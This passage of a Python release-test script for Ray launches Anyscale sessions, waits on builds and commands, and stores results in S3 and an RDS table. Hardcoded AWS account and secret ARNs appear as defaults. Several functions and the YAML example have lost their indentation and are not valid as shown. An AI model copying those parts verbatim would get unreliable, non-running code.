Long running tests
------------------
Long running tests can be kicked off with by adding the --kick-off-only
parameters to the e2e script. The status can then be checked with the
--check command.
Long running test sessions will be terminated after `timeout` seconds, after
which the latest result in the TEST_OUTPUT_JSON will be reported. Thus,
long running release tests should update this file periodically.
There are also two config options to configure behavior. The `time_key` is
needed to track the latest update of the TEST_OUTPUT_JSON and should contain
a floating point number (usually `time.time()`). The `max_update_delay` then
specified the maximum time in seconds that can be passed without an update
to the results json. If the output file hasn't been updated in e.g. 60 seconds,
this could indicate that the command is stale/frozen, and thus should fail.
Release test yaml example
-------------------------
- name: example
owner:
mail: "kai@anyscale.com" # Currently not used
slack: "@tune-team" # Currently not used
cluster:
app_config: app_config.yaml # Relative to the release test yaml
compute_template: tpl_cpu.yaml
run:
timeout: 600 # in seconds
prepare: python wait_cluster.py 4 600 # prepare cmd to run before test
script: python workloads/train.py # actual release test command
# Only needed for long running test
time_key: last_update # Key in the results json indicating current time
max_update_delay: 30 # If state hasn't been updated in 30s, terminate
# This block is optional
artifacts:
# Artifact name: location on head node
- detailed_output: detailed_output.csv
# This block is optional. If present, the contents will be
# deep updated for smoke testing
smoke_test:
cluster:
compute_template: tpl_cpu_smoketest.yaml
""" # noqa: E501
import argparse
import boto3
import collections
import copy
import datetime
import hashlib
import jinja2
import json
import logging
import multiprocessing
import os
import requests
import shutil
import subprocess
import sys
import tempfile
import time
from queue import Empty
from typing import Any, Dict, Optional, Tuple, List
import yaml
import anyscale
import anyscale.conf
from anyscale.api import instantiate_api_client
from anyscale.controllers.session_controller import SessionController
from anyscale.sdk.anyscale_client.sdk import AnyscaleSDK
# Configure the root logger: INFO level, streaming to stdout (so CI systems
# capture it) with level, timestamp and source location in each line.
logger = logging.getLogger()
logger.setLevel(logging.INFO)
handler = logging.StreamHandler(stream=sys.stdout)
formatter = logging.Formatter(fmt="[%(levelname)s %(asctime)s] "
                              "%(filename)s: %(lineno)d "
                              "%(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
def getenv_default(key: str, default: Optional[str] = None):
    """Fetch an environment variable, falling back to ``default``.

    A variable that is set to the empty string is treated as unset and
    also yields ``default``.
    """
    value = os.environ.get(key)
    return value if value else default
# Global configuration, read from environment variables with release-automation
# defaults. Besides direct lookups, this dict is overlaid onto the environment
# when rendering jinja2 config templates (_load_config) and when launching
# test subprocesses (run_job).
GLOBAL_CONFIG = {
    # Anyscale account / endpoint used to start sessions.
    "ANYSCALE_USER": getenv_default("ANYSCALE_USER",
                                    "release-automation@anyscale.com"),
    "ANYSCALE_HOST": getenv_default("ANYSCALE_HOST",
                                    "https://beta.anyscale.com"),
    "ANYSCALE_CLI_TOKEN": getenv_default("ANYSCALE_CLI_TOKEN"),
    "ANYSCALE_CLOUD_ID": getenv_default(
        "ANYSCALE_CLOUD_ID",
        "cld_4F7k8814aZzGG8TNUGPKnc"),  # cld_4F7k8814aZzGG8TNUGPKnc
    "ANYSCALE_PROJECT": getenv_default("ANYSCALE_PROJECT", ""),
    # Ray version / repo / branch to look up release wheels for.
    "RAY_VERSION": getenv_default("RAY_VERSION", "2.0.0.dev0"),
    "RAY_REPO": getenv_default("RAY_REPO",
                               "https://github.com/ray-project/ray.git"),
    "RAY_BRANCH": getenv_default("RAY_BRANCH", "master"),
    # AWS S3 bucket and RDS database receiving test results and artifacts.
    "RELEASE_AWS_BUCKET": getenv_default("RELEASE_AWS_BUCKET",
                                         "ray-release-automation-results"),
    "RELEASE_AWS_LOCATION": getenv_default("RELEASE_AWS_LOCATION", "dev"),
    "RELEASE_AWS_DB_NAME": getenv_default("RELEASE_AWS_DB_NAME", "ray_ci"),
    "RELEASE_AWS_DB_TABLE": getenv_default("RELEASE_AWS_DB_TABLE",
                                           "release_test_result"),
    "RELEASE_AWS_DB_SECRET_ARN": getenv_default(
        "RELEASE_AWS_DB_SECRET_ARN",
        "arn:aws:secretsmanager:us-west-2:029272617770:secret:"
        "rds-db-credentials/cluster-7RB7EYTTBK2EUC3MMTONYRBJLE/ray_ci-MQN2hh",
    ),
    "RELEASE_AWS_DB_RESOURCE_ARN": getenv_default(
        "RELEASE_AWS_DB_RESOURCE_ARN",
        "arn:aws:rds:us-west-2:029272617770:cluster:ci-reporting",
    ),
    # Timestamps captured at import time (used e.g. in session names) and
    # pre-rendered expiration dates 1/2/3 days out.
    "DATESTAMP": str(datetime.datetime.now().strftime("%Y%m%d")),
    "TIMESTAMP": str(int(datetime.datetime.now().timestamp())),
    "EXPIRATION_1D": str((datetime.datetime.now() +
                          datetime.timedelta(days=1)).strftime("%Y-%m-%d")),
    "EXPIRATION_2D": str((datetime.datetime.now() +
                          datetime.timedelta(days=2)).strftime("%Y-%m-%d")),
    "EXPIRATION_3D": str((datetime.datetime.now() +
                          datetime.timedelta(days=3)).strftime("%Y-%m-%d")),
}
# Interval (seconds) between "... still waiting" progress log messages.
REPORT_S = 30
def maybe_fetch_api_token():
    """Populate GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] if it is unset.

    Falls back to fetching the release-automation account's token from
    the AWS secrets manager.
    """
    if GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] is not None:
        return
    print("Missing ANYSCALE_CLI_TOKEN, retrieving from AWS secrets store")
    # NOTE(simon) This should automatically retrieve
    # release-automation@anyscale.com's anyscale token
    secrets_client = boto3.client("secretsmanager", region_name="us-west-2")
    secret = secrets_client.get_secret_value(
        SecretId="arn:aws:secretsmanager:us-west-2:029272617770:secret:"
        "release-automation/"
        "anyscale-token20210505220406333800000001-BcUuKB")
    GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"] = secret["SecretString"]
class PrepareCommandRuntimeError(RuntimeError):
    """Raised when the prepare command returns a non-zero status code."""
    pass
class ReleaseTestTimeoutError(RuntimeError):
    """Base class for timeouts hit while running a release test."""
    pass
class SessionTimeoutError(ReleaseTestTimeoutError):
    """Raised when starting a session exceeds the timeout."""
    pass
class FileSyncTimeoutError(ReleaseTestTimeoutError):
    """Raised when syncing files exceeds the timeout."""
    pass
class CommandTimeoutError(ReleaseTestTimeoutError):
    """Raised when running the test command exceeds the timeout."""
    pass
class PrepareCommandTimeoutError(ReleaseTestTimeoutError):
    """Raised when running the prepare command exceeds the timeout."""
    pass
class State:
    """Progress message passed between processes via the result queue.

    ``state`` is a short tag such as "CMD_RUN" or "END"; ``timestamp`` is
    the ``time.time()`` it was recorded; ``data`` is an arbitrary payload
    (for "END" states it carries the final result dict).
    """

    def __init__(self, state: str, timestamp: float, data: Any):
        self.state = state
        self.timestamp = timestamp
        self.data = data
# Put Anyscale's bundled Ray directory first on the import path.
sys.path.insert(0, anyscale.ANYSCALE_RAY_DIR)
def anyscale_project_url(project_id: str):
    """Return the Anyscale web UI URL for a project's session list."""
    host = GLOBAL_CONFIG["ANYSCALE_HOST"]
    return (f"{host}/o/anyscale-internal/projects/{project_id}"
            f"/?tab=session-list")
def anyscale_session_url(project_id: str, session_id: str):
    """Return the Anyscale web UI URL for a single session (cluster)."""
    host = GLOBAL_CONFIG["ANYSCALE_HOST"]
    path = f"/o/anyscale-internal/projects/{project_id}/clusters/{session_id}"
    return host + path
def anyscale_compute_tpl_url(compute_tpl_id: str):
    """Return the Anyscale web UI URL for a compute template."""
    return (f"{GLOBAL_CONFIG['ANYSCALE_HOST']}"
            f"/o/anyscale-internal/configurations/cluster-computes"
            f"/{compute_tpl_id}")
def anyscale_app_config_build_url(build_id: str):
    """Return the Anyscale web UI URL for an app config build."""
    host = GLOBAL_CONFIG["ANYSCALE_HOST"]
    return (f"{host}/o/anyscale-internal/configurations/app-config-details"
            f"/{build_id}")
def wheel_url(ray_version, git_branch, git_commit):
    """Return the S3 download URL of the Ray wheel built at a commit.

    The URL always points at the CPython 3.7 manylinux wheel; other
    platforms are derived from it by string replacement elsewhere.
    """
    base = "https://s3-us-west-2.amazonaws.com/ray-wheels"
    wheel_name = f"ray-{ray_version}-cp37-cp37m-manylinux2014_x86_64.whl"
    return f"{base}/{git_branch}/{git_commit}/{wheel_name}"
def wheel_exists(ray_version, git_branch, git_commit):
    """Check via an HTTP HEAD request whether the wheel exists on S3."""
    response = requests.head(wheel_url(ray_version, git_branch, git_commit))
    return response.status_code == 200
def get_latest_commits(repo: str, branch: str = "master") -> List[str]:
    """Return the hashes of the latest 10 commits on ``branch`` of ``repo``.

    Performs a cheap (tree-less, no-checkout) clone into a temporary
    directory and reads the log from there.

    Args:
        repo: Git URL of the repository to inspect.
        branch: Branch whose history should be listed.

    Returns:
        List of commit hashes, most recent first.
    """
    cur = os.getcwd()
    try:
        with tempfile.TemporaryDirectory() as tmpdir:
            os.chdir(tmpdir)

            clone_cmd = [
                "git",
                "clone",
                "--filter=tree:0",
                "--no-checkout",
                # "--single-branch",
                # "--depth=10",
                f"--branch={branch}",
                repo,
                tmpdir,
            ]
            log_cmd = [
                "git",
                "log",
                "-n",
                "10",
                "--pretty=format:%H",
            ]

            subprocess.check_output(clone_cmd)
            commits = subprocess.check_output(log_cmd).decode(
                sys.stdout.encoding).split("\n")
    finally:
        # Bug fix: always restore the original working directory. Previously
        # a failing git command left the process chdir'ed into the (by then
        # removed) temporary directory.
        os.chdir(cur)
    return commits
def find_ray_wheels(repo: str, branch: str, version: str):
    """Find the newest commit on ``branch`` that has a pre-built wheel.

    As a side effect, exports RAY_WHEELS and RAY_COMMIT for the commit
    that was found.

    Returns:
        The wheel URL, or None if none of the latest commits has a wheel.
    """
    commits = get_latest_commits(repo, branch)
    logger.info(f"Latest 10 commits for branch {branch}: {commits}")
    for commit in commits:
        if not wheel_exists(version, branch, commit):
            continue
        found_url = wheel_url(version, branch, commit)
        os.environ["RAY_WHEELS"] = found_url
        os.environ["RAY_COMMIT"] = commit
        logger.info(
            f"Found wheels URL for Ray {version}, branch {branch}: "
            f"{found_url}")
        return found_url
    return None
def populate_wheels_sanity_check(commit: Optional[str] = None):
    """Export RAY_WHEELS_SANITY_CHECK, a command asserting the Ray commit.

    Raises:
        RuntimeError: If no commit hash was given.
    """
    if not commit:
        raise RuntimeError(f"Could not populate wheels sanity check command: "
                           f"Commit hash missing. Got: {commit}")
    os.environ["RAY_WHEELS_SANITY_CHECK"] = (
        f"python -c 'import ray; assert ray.__commit__ == \"{commit}\"'")
def _check_stop(stop_event: multiprocessing.Event, timeout_type: str):
if stop_event.is_set():
if timeout_type == "prepare_command":
raise PrepareCommandTimeoutError(
"Process timed out in the prepare command stage.")
if timeout_type == "command":
raise CommandTimeoutError(
"Process timed out while running a command.")
elif timeout_type == "file_sync":
raise FileSyncTimeoutError(
"Process timed out while syncing files.")
elif timeout_type == "session":
raise SessionTimeoutError(
"Process timed out while starting a session.")
else:
assert False, "Unexpected timeout type."
def _deep_update(d, u):
for k, v in u.items():
if isinstance(v, collections.abc.Mapping):
d[k] = _deep_update(d.get(k, {}), v)
else:
d[k] = v
return d
def _dict_hash(dt: Dict[Any, Any]) -> str:
json_str = json.dumps(dt, sort_keys=True, ensure_ascii=True)
sha = hashlib.sha256()
sha.update(json_str.encode())
return sha.hexdigest()
def _load_config(local_dir: str, config_file: Optional[str]) -> Optional[Dict]:
if not config_file:
return None
config_path = os.path.join(local_dir, config_file)
with open(config_path, "rt") as f:
# Todo: jinja2 render
content = f.read()
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
content = jinja2.Template(content).render(env=env)
return yaml.safe_load(content)
def has_errored(result: Dict[Any, Any]) -> bool:
    """Return True unless the result dict reports a "finished" status."""
    status = result.get("status", "invalid")
    return status != "finished"
def report_result(test_suite: str, test_name: str, status: str, logs: str,
                  results: Dict[Any, Any], artifacts: Dict[Any, Any],
                  category: str):
    """Insert one release test result row into the AWS RDS results table.

    Args:
        test_suite: Name of the test suite.
        test_name: Name of the individual test.
        status: Final status string (e.g. "finished", "error", "timeout").
        logs: Last log excerpt to store with the result.
        results: Result dict; stored as a JSON column.
        artifacts: Artifact name -> S3 URL mapping; stored as JSON.
        category: Test category.
    """
    now = datetime.datetime.utcnow()
    rds_data_client = boto3.client("rds-data", region_name="us-west-2")

    schema = GLOBAL_CONFIG["RELEASE_AWS_DB_TABLE"]

    sql = (
        f"INSERT INTO {schema} "
        f"(created_on, test_suite, test_name, status, last_logs, "
        f"results, artifacts, category) "
        f"VALUES (:created_on, :test_suite, :test_name, :status, :last_logs, "
        f":results, :artifacts, :category)")

    def _string_param(name, value, type_hint=None):
        # Build one RDS Data API parameter entry (all values are strings).
        param = {"name": name, "value": {"stringValue": value}}
        if type_hint:
            param["typeHint"] = type_hint
        return param

    parameters = [
        _string_param("created_on", now.strftime("%Y-%m-%d %H:%M:%S"),
                      type_hint="TIMESTAMP"),
        _string_param("test_suite", test_suite),
        _string_param("test_name", test_name),
        _string_param("status", status),
        _string_param("last_logs", logs),
        _string_param("results", json.dumps(results), type_hint="JSON"),
        _string_param("artifacts", json.dumps(artifacts), type_hint="JSON"),
        _string_param("category", category),
    ]

    rds_data_client.execute_statement(
        database=GLOBAL_CONFIG["RELEASE_AWS_DB_NAME"],
        parameters=parameters,
        secretArn=GLOBAL_CONFIG["RELEASE_AWS_DB_SECRET_ARN"],
        resourceArn=GLOBAL_CONFIG["RELEASE_AWS_DB_RESOURCE_ARN"],
        schema=schema,
        sql=sql,
    )
def log_results_and_artifacts(result: Dict):
    """Log the results and artifacts contained in a result dict."""

    def _listing(found_msg, empty_msg, items):
        # Render a key/value listing, or the fallback message when empty.
        if not items:
            return empty_msg
        body = "\n".join(f"  {key} = {val}" for key, val in items.items())
        return found_msg + "\n\n" + body + "\n"

    logger.info(
        _listing("Observed the following results:",
                 "Did not find any results.", result.get("results", {})))
    logger.info(
        _listing("Saved the following artifacts:",
                 "Did not find any artifacts.", result.get("artifacts", {})))
def _cleanup_session(sdk: AnyscaleSDK, session_id: str):
    """Trigger termination of a session (fire and forget)."""
    if not session_id:
        return
    # Just trigger a request. No need to wait until session shutdown.
    sdk.terminate_session(session_id=session_id, terminate_session_options={})
def search_running_session(sdk: AnyscaleSDK, project_id: str,
                           session_name: str) -> Optional[str]:
    """Look up a running session with the given exact name.

    Returns:
        The session ID if a session named ``session_name`` exists in the
        project and is in state "Running", otherwise None.
    """
    logger.info(f"Looking for existing session with name {session_name}")

    result = sdk.search_sessions(
        project_id=project_id,
        sessions_query=dict(name=dict(equals=session_name)))

    if not result.results or result.results[0].state != "Running":
        return None

    logger.info("Found existing session.")
    return result.results[0].id
def create_or_find_compute_template(
        sdk: AnyscaleSDK,
        project_id: str,
        compute_tpl: Dict[Any, Any],
        _repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
    """Look up a compute template by content hash, creating it if missing.

    The template name is derived from a hash of its contents, so identical
    configs map to the same Anyscale template. A failed create is retried
    once after 10 seconds (guarded by ``_repeat``).

    Args:
        sdk: Anyscale SDK client.
        project_id: Project the template belongs to.
        compute_tpl: Compute template config dict (may be falsy).
        _repeat: Internal flag allowing a single retry after a failure.

    Returns:
        Tuple of (template ID, template name); both None if ``compute_tpl``
        is falsy.
    """
    compute_tpl_id = None
    compute_tpl_name = None
    if compute_tpl:
        # As of Anyscale 0.4.1, it is an error to use the same compute template
        # name within the same organization, between different projects.
        compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
        logger.info(f"Tests uses compute template "
                    f"with name {compute_tpl_name}. Looking up existing "
                    f"templates.")

        # Page through existing templates, matching by name.
        paging_token = None
        while not compute_tpl_id:
            result = sdk.search_compute_templates(
                dict(
                    project_id=project_id,
                    name=dict(equals=compute_tpl_name),
                    include_anonymous=True),
                paging_token=paging_token)
            paging_token = result.metadata.next_paging_token

            for res in result.results:
                if res.name == compute_tpl_name:
                    compute_tpl_id = res.id
                    logger.info(
                        f"Template already exists with ID {compute_tpl_id}")
                    break

            if not paging_token:
                break

        if not compute_tpl_id:
            logger.info(f"Compute template not found. "
                        f"Creating with name {compute_tpl_name}.")
            try:
                result = sdk.create_compute_template(
                    dict(
                        name=compute_tpl_name,
                        project_id=project_id,
                        config=compute_tpl))
                compute_tpl_id = result.result.id
            except Exception as e:
                if _repeat:
                    # Creation can race with a concurrent run; wait and retry
                    # the whole lookup/create once.
                    logger.warning(
                        f"Got exception when trying to create compute "
                        f"template: {e}. Sleeping for 10 seconds and then "
                        f"try again once...")
                    time.sleep(10)
                    return create_or_find_compute_template(
                        sdk=sdk,
                        project_id=project_id,
                        compute_tpl=compute_tpl,
                        _repeat=False)

                raise e

            logger.info(f"Compute template created with ID {compute_tpl_id}")

    return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
        sdk: AnyscaleSDK,
        project_id: str,
        app_config: Dict[Any, Any],
        _repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
    """Look up an app config by content hash, creating it if missing.

    Mirrors ``create_or_find_compute_template``: the name is derived from
    a hash of the config contents, and a failed create is retried once
    after 10 seconds (guarded by ``_repeat``).

    Args:
        sdk: Anyscale SDK client.
        project_id: Project the app config belongs to.
        app_config: App config dict (may be falsy).
        _repeat: Internal flag allowing a single retry after a failure.

    Returns:
        Tuple of (app config ID, app config name); both None if
        ``app_config`` is falsy.
    """
    app_config_id = None
    app_config_name = None
    if app_config:
        app_config_name = f"{project_id}-{_dict_hash(app_config)}"
        logger.info(f"Test uses an app config with hash {app_config_name}. "
                    f"Looking up existing app configs with this name.")

        # Page through existing app configs, matching by name.
        paging_token = None
        while not app_config_id:
            result = sdk.list_app_configs(
                project_id=project_id, count=50, paging_token=paging_token)
            paging_token = result.metadata.next_paging_token

            for res in result.results:
                if res.name == app_config_name:
                    app_config_id = res.id
                    logger.info(
                        f"App config already exists with ID {app_config_id}")
                    break

            if not paging_token or app_config_id:
                break

        if not app_config_id:
            logger.info("App config not found. Creating new one.")
            try:
                result = sdk.create_app_config(
                    dict(
                        name=app_config_name,
                        project_id=project_id,
                        config_json=app_config))
                app_config_id = result.result.id
            except Exception as e:
                if _repeat:
                    # Creation can race with a concurrent run; wait and retry
                    # the whole lookup/create once.
                    logger.warning(
                        f"Got exception when trying to create app "
                        f"config: {e}. Sleeping for 10 seconds and then "
                        f"try again once...")
                    time.sleep(10)
                    return create_or_find_app_config(
                        sdk=sdk,
                        project_id=project_id,
                        app_config=app_config,
                        _repeat=False)

                raise e

            logger.info(f"App config created with ID {app_config_id}")

    return app_config_id, app_config_name
def install_app_config_packages(app_config: Dict[Any, Any]):
    """Locally install the pip packages listed in an app config.

    Any ``env_vars`` from the app config are exported into the current
    process environment first.
    """
    os.environ.update(app_config.get("env_vars", {}))
    for requirement in app_config["python"]["pip_packages"]:
        subprocess.check_output(
            ["pip", "install", "-U", requirement], text=True)
def install_matching_ray():
    """Replace the local Ray install with the wheel from RAY_WHEELS.

    The RAY_WHEELS URL always names the manylinux wheel; the platform tag
    is rewritten to match the local interpreter's platform. No-op when
    RAY_WHEELS is not set.
    """
    wheel = os.environ.get("RAY_WHEELS", None)
    if not wheel:
        return
    assert "manylinux2014_x86_64" in wheel, wheel
    platform_tags = {
        "darwin": "macosx_10_15_intel",
        "win32": "win_amd64",
    }
    platform = platform_tags.get(sys.platform, "manylinux2014_x86_64")
    wheel = wheel.replace("manylinux2014_x86_64", platform)
    subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
    subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
                            app_config_id: Optional[str]) -> Optional[str]:
    """Wait until an app config build succeeds and return its build ID.

    Considers the builds sorted by creation time: if the newest
    non-failed build already succeeded, returns immediately; otherwise
    polls it once per second until it finishes.

    Returns:
        The build ID, or None if ``app_config_id`` is None.

    Raises:
        RuntimeError: If all builds failed, no build exists, or the build
            ends in an unknown status.
    """
    if not app_config_id:
        return None

    # Fetch build
    build_id = None
    last_status = None
    result = sdk.list_builds(app_config_id)
    for build in sorted(result.results, key=lambda b: b.created_at):
        build_id = build.id
        last_status = build.status

        if build.status == "failed":
            continue

        if build.status == "succeeded":
            logger.info(f"Link to app config build: "
                        f"{anyscale_app_config_build_url(build_id)}")
            return build_id

    if last_status == "failed":
        raise RuntimeError("App config build failed.")

    if not build_id:
        raise RuntimeError("No build found for app config.")

    # Build found but not failed/finished yet
    completed = False
    start_wait = time.time()
    next_report = start_wait + REPORT_S
    logger.info(f"Waiting for build {build_id} to finish...")
    logger.info(f"Track progress here: "
                f"{anyscale_app_config_build_url(build_id)}")
    while not completed:
        now = time.time()
        if now > next_report:
            # Periodic progress log every REPORT_S seconds.
            logger.info(f"... still waiting for build {build_id} to finish "
                        f"({int(now - start_wait)} seconds) ...")
            next_report = next_report + REPORT_S

        result = sdk.get_build(build_id)
        build = result.result

        if build.status == "failed":
            raise RuntimeError(
                f"App config build failed. Please see "
                f"{anyscale_app_config_build_url(build_id)} for details")

        if build.status == "succeeded":
            logger.info("Build succeeded.")
            return build_id

        completed = build.status not in ["in_progress", "pending"]

        if completed:
            raise RuntimeError(
                f"Unknown build status: {build.status}. Please see "
                f"{anyscale_app_config_build_url(build_id)} for details")

        time.sleep(1)

    return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
            job_name: str, min_workers: str, script: str,
            script_args: List[str], env_vars: Dict[str, str],
            autosuspend: int) -> Tuple[int, str]:
    """Run a test script locally against an Anyscale connect cluster.

    Points RAY_ADDRESS at an anyscale:// URL and launches the script as a
    subprocess, streaming its combined stdout/stderr to our stdout.

    Returns:
        Tuple of (subprocess return code, captured log output).
    """
    # Start cluster and job
    # NOTE(review): the trailing "&&" looks like a doubled query separator —
    # confirm whether the anyscale:// address parser requires it before
    # changing it.
    address = (f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}"
               f"&cluster_env={cluster_env_name}&autosuspend={autosuspend}"
               "&&update=True")
    logger.info(f"Starting job {job_name} with Ray address: {address}")

    job_env = copy.deepcopy(os.environ)
    job_env.update(GLOBAL_CONFIG)
    job_env.update(env_vars)
    job_env["RAY_ADDRESS"] = address
    job_env["RAY_JOB_NAME"] = job_name
    job_env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)

    proc = subprocess.Popen(
        script.split(" ") + script_args,
        env=job_env,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True)
    proc.stdout.reconfigure(line_buffering=True)

    captured = []
    for line in proc.stdout:
        captured.append(line)
        sys.stdout.write(line)

    proc.wait()
    return proc.returncode, "".join(captured)
def create_and_wait_for_session(
        sdk: AnyscaleSDK,
        stop_event: multiprocessing.Event,
        session_name: str,
        session_options: Dict[Any, Any],
) -> str:
    """Create a session, start it, and block until the start completes.

    Polls the start operation once per second, logging progress every
    REPORT_S seconds. If ``stop_event`` is set, ``_check_stop`` raises a
    SessionTimeoutError.

    Returns:
        The ID of the started session.
    """
    # Create session
    logger.info(f"Creating session {session_name}")
    result = sdk.create_session(session_options)
    session_id = result.result.id

    # Trigger session start
    logger.info(f"Starting session {session_name} ({session_id})")
    session_url = anyscale_session_url(
        project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
    logger.info(f"Link to session: {session_url}")

    result = sdk.start_session(session_id, start_session_options={})
    sop_id = result.result.id  # Session operation ID used for polling below.
    completed = result.result.completed

    # Wait for session
    logger.info(f"Waiting for session {session_name}...")
    start_wait = time.time()
    next_report = start_wait + REPORT_S
    while not completed:
        # Raises SessionTimeoutError when the global timeout was hit.
        _check_stop(stop_event, "session")

        now = time.time()
        if now > next_report:
            logger.info(f"... still waiting for session {session_name} "
                        f"({int(now - start_wait)} seconds) ...")
            next_report = next_report + REPORT_S

        session_operation_response = sdk.get_session_operation(
            sop_id, _request_timeout=30)
        session_operation = session_operation_response.result
        completed = session_operation.completed
        time.sleep(1)

    return session_id
def run_session_command(sdk: AnyscaleSDK,
                        session_id: str,
                        cmd_to_run: str,
                        result_queue: multiprocessing.Queue,
                        env_vars: Dict[str, str],
                        state_str: str = "CMD_RUN") -> Tuple[str, Any]:
    """Kick off a shell command on a session (does not wait for it).

    ``env_vars`` are prepended to the command as KEY=value pairs. A State
    tagged ``state_str`` is pushed onto ``result_queue`` to mark progress.

    Returns:
        Tuple of (session command ID, create-command API response). The
        response is later passed to ``wait_for_session_command_to_complete``.
        (Annotation fixed: the second element is the response object, not
        an int.)
    """
    full_cmd = " ".join(f"{k}={v}"
                        for k, v in env_vars.items()) + " " + cmd_to_run

    logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
    session_url = anyscale_session_url(
        project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
    logger.info(f"Link to session: {session_url}")
    result_queue.put(State(state_str, time.time(), None))
    result = sdk.create_session_command(
        dict(session_id=session_id, shell_command=full_cmd))

    scd_id = result.result.id
    return scd_id, result
def wait_for_session_command_to_complete(create_session_command_result,
                                         sdk: AnyscaleSDK,
                                         scd_id: str,
                                         stop_event: multiprocessing.Event,
                                         state_str: str = "CMD_RUN"):
    """Poll a session command until it finishes; raise on non-zero exit.

    Args:
        create_session_command_result: Response from ``run_session_command``.
        sdk: Anyscale SDK client.
        scd_id: Session command ID to poll.
        stop_event: Set when the global timeout was reached; translated by
            ``_check_stop`` into a command/prepare-command timeout error
            depending on ``state_str``.
        state_str: "CMD_RUN" for the test command, "CMD_PREPARE" for the
            prepare command.

    Returns:
        Tuple of (status code, runtime in seconds).

    Raises:
        RuntimeError: The test command returned a non-zero status code.
        PrepareCommandRuntimeError: The prepare command returned non-zero.
    """
    result = create_session_command_result
    completed = result.result.finished_at is not None
    start_wait = time.time()
    next_report = start_wait + REPORT_S
    while not completed:
        # Map the timeout to the right error type for this command stage.
        if state_str == "CMD_RUN":
            _check_stop(stop_event, "command")
        elif state_str == "CMD_PREPARE":
            _check_stop(stop_event, "prepare_command")

        now = time.time()
        if now > next_report:
            logger.info(f"... still waiting for command to finish "
                        f"({int(now - start_wait)} seconds) ...")
            next_report = next_report + REPORT_S

        result = sdk.get_session_command(session_command_id=scd_id)
        completed = result.result.finished_at
        time.sleep(1)

    status_code = result.result.status_code
    runtime = time.time() - start_wait

    if status_code != 0:
        if state_str == "CMD_RUN":
            raise RuntimeError(
                f"Command returned non-success status: {status_code}")
        elif state_str == "CMD_PREPARE":
            raise PrepareCommandRuntimeError(
                f"Prepare command returned non-success status: {status_code}")

    return status_code, runtime
def get_command_logs(session_controller: SessionController,
                     scd_id: str,
                     lines: int = 50):
    """Fetch the last ``lines`` log lines of a session command."""
    api = session_controller.api_client
    result = api.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get(  # noqa: E501
        session_command_id=scd_id,
        start_line=-1 * lines,
        end_line=0)
    return result.result.lines
def get_remote_json_content(
        temp_dir: str,
        session_name: str,
        remote_file: Optional[str],
        session_controller: SessionController,
):
    """Pull a JSON file from a session's head node and parse it.

    Returns:
        The parsed JSON content, or an empty dict if ``remote_file`` is
        not set.
    """
    if not remote_file:
        logger.warning("No remote file specified, returning empty dict")
        return {}

    target_path = os.path.join(temp_dir, ".tmp.json")
    session_controller.pull(
        session_name=session_name,
        source=remote_file,
        target=target_path)
    with open(target_path, "rt") as handle:
        return json.load(handle)
def get_local_json_content(local_file: Optional[str], ):
    """Parse a local JSON file, or return {} when no file is given."""
    if not local_file:
        logger.warning("No local file specified, returning empty dict")
        return {}
    with open(local_file, "rt") as handle:
        return json.load(handle)
def pull_artifacts_and_store_in_cloud(
        temp_dir: str,
        logs: str,
        session_name: str,
        test_name: str,
        artifacts: Optional[Dict[Any, Any]],
        session_controller: SessionController,
):
    """Upload logs and test artifacts to the release results S3 bucket.

    The logs are written to a local ``output.log`` and uploaded; each
    artifact is first pulled from the session head node, then uploaded.

    Returns:
        Dict mapping artifact names (plus "output.log") to their S3 URLs.
    """
    bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
    location = (f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}"
                f"/{session_name}/{test_name}")
    s3_client = boto3.client("s3")
    saved_artifacts = {}

    # Persist and upload the captured logs.
    output_log_file = os.path.join(temp_dir, "output.log")
    with open(output_log_file, "wt") as f:
        f.write(logs)
    s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
    saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"

    # Download artifacts from the session, then push them to S3.
    for name, remote_file in (artifacts or {}).items():
        logger.info(f"Downloading artifact `{name}` from "
                    f"{remote_file}")
        local_target_file = os.path.join(temp_dir, name)
        session_controller.pull(
            session_name=session_name,
            source=remote_file,
            target=local_target_file)

        s3_client.upload_file(local_target_file, bucket,
                              f"{location}/{name}")
        saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"

    return saved_artifacts
def find_session_by_test_name(
        sdk: AnyscaleSDK,
        session_controller: SessionController,
        temp_dir: str,
        state_json: str,
        project_id: str,
        test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
    """Find a running session belonging to a (long running) test.

    Searches running sessions whose name contains ``test_name`` and whose
    remote state file reports the same test name.

    Args:
        sdk: Anyscale SDK client.
        session_controller: Controller used to pull the remote state file.
        temp_dir: Local directory for temporary downloads.
        state_json: Path of the state JSON file on the session head node.
        project_id: Anyscale project to search in.
        test_name: Name of the test to look for.

    Returns:
        Tuple of (session ID, session name, session state dict), or None
        if no matching session was found.

    Raises:
        RuntimeError: If the remote state file could not be fetched.
    """
    paging_token = None

    while True:  # Will break if paging_token is None after first search
        result = sdk.search_sessions(
            project_id=project_id,
            sessions_query=dict(
                name=dict(contains=test_name),
                state_filter=["Running"],
                paging=dict(count=20, paging_token=paging_token)))

        for session in result.results:
            logger.info(f"Found sessions {session.name}")
            if not session.name.startswith(test_name):
                continue

            try:
                session_state = get_remote_json_content(
                    temp_dir=temp_dir,
                    session_name=session.name,
                    remote_file=state_json,
